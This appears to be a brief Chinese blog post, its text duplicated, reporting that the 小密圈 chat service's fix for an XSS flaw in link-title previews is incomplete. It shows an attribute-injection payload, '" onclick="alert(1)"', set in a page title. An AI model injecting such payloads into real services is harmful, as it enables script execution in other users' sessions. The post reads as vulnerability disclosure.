时隔半年,复测一下。 结果发现小密圈给修复了,但是修复的不彻底。还可以继续娱乐一把。
<html>
<head>
<title>" onclick="alert(1)"
由于没有过滤双引号,可以造成标签内的XSS,但是由于有长度限制,只能娱乐娱乐。
1513567821(1).png造成问题的原因是发消息的时候,贴上链接地址,小密圈服务器会去解析页面的title。
<title>" onclick="alert(1)"
时隔半年,复测一下。 结果发现小密圈给修复了,但是修复的不彻底。还可以继续娱乐一把。
<html>
<head>
<title>" onclick="alert(1)"
由于没有过滤双引号,可以造成标签内的XSS,但是由于有长度限制,只能娱乐娱乐。
1513567821(1).png造成问题的原因是发消息的时候,贴上链接地址,小密圈服务器会去解析页面的title。
<title>" onclick="alert(1)"
Copyright © 2019- zicool.com 版权所有 湘ICP备2023022495号-2
违法及侵权请联系:TEL:199 1889 7713 E-MAIL:2724546146@qq.com
本站由北京市万商天勤律师事务所王兴未律师提供法律服务